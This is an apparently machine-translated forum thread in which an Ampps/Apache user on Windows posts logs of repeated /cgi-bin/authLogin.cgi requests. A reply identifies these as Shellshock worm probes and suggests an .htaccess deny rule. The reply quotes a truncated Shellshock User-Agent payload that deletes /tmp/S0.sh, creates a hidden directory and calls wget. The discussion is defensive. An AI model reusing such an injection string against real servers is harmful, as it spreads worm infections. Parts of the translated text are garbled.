嗨,朋友们,
我在Windows服务器数据中心使用带有php 5.3.29的Ampps服务器。
不幸的是,我在Windows服务器和我的站点中收到以下提示。
提示标题:Microsoft窗口
提示消息:Apache http 服务器已停止工作。
问题导致程序停止正常工作。 Windows 将关闭程序,并在解决方案可用时通知您。
跟踪:
当我跟踪错误和访问日志时,我发现以下日志是原因。
在 Apache 访问日志中:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET/cgi-bin/authLogin.cgi HTTP/1.1" 404 1335217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET/cgi-bin/authLogin.cgi HTTP/1.1" 404 1335209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET/cgi-bin/authLogin.cgi HTTP/1.1" 404 133581.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET/cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
在 Apache 错误日志中:
[2014 年 12 月 10 日星期三 07:25:04.401073] [CGI:错误] [PID 2908:TID 1168] [客户端 81.214.132.245:36246] 找不到或无法统计脚本:D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
请帮助我。
有一个 Web 机器人试图获得权限,以便它可以获取并执行类似 S0.py 的东西,我想这是一个蠕虫,因此下载服务器受到损害。id 就像 S0.sh 的副本,如果你碰巧得到一个,把它交给 exploit-db 或类似的东西。聪明的命令是:Get/cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:(( { :; };/bin/rm -rf/tmp/S0.sh &&/bin/mkdir -p/share/HDB_DATA/.../php &&/usr/bin/wget
下载后将执行该文件。我想HDB_DATA有一些东西,我什至没有。"信息至上!"
如果您尝试打开此文件,会发生什么情况?
d:/program files/ampps/www/cgi-bin/authLogin.cgi
该消息指示该文件不存在,如 404 错误和消息"找不到脚本"所示。
我拒绝了这些客户端访问cgi-bin目录。
在CGI-bin目录中,我创建了一个.htaccess文件
我在 .htaccess 中添加了以下行
否认所有人。
我认为authLogin.cgi除了可能允许某人执行之外,真的很重要。问题是用户尝试或成功删除/tmp/S0.sh并在共享文件夹中创建一个目录 php,然后执行 wget。
/bin/rm -rf/tmp/S0.sh &&/bin/mkdir -p/share/HDB_DATA/.../php &&/usr/bin/wget
以下是在思考了那么长时间之后出现的问题:http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh 由两个主要部分组成...第一部分执行初始设置并下载其他程序,然后第二部分安装蠕虫并执行一些其他命令。
所以抓住这个动作是一种真正的享受,最初没有人知道称之为Shellshock。那里有一份 S0.sh 的副本,你可以看到它是一个蠕虫,我猜是这样。
从我读到的内容来看,蠕虫只是浏览 IP 空间,寻找任何监听端口 8080 的人。